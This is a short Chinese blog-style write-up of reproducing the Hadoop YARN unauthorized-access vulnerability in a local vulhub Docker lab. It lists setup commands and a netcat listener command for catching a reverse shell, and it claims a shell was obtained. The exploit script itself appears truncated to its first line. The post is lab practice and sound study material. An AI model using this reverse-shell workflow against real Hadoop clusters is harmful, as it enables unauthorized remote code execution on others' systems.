hadoop未授权访问漏洞复现
有一说一复现这玩意儿单纯只是想在hadoop开课前学会日hadoop,哦我这该死的强迫症(doge)
环境vulhub摆烂
cd vulhub/hadoop/unauthorized-yarn进入目录
docker-compose up -d开启环境

浏览器访问http://127.0.0.1:8088(环境默认映射到8088端口,也可以在docker-compose.yml里改)

确认环境正常后,kali开启监听nc -lvp 9999
然后就可以上exp了
1 | #!/usr/bin/env python |
成功反弹shell

下附漏洞原理
有兴趣的大佬可以去了解一下漏洞原理,这玩意儿全英文看的我头皮发麻。。。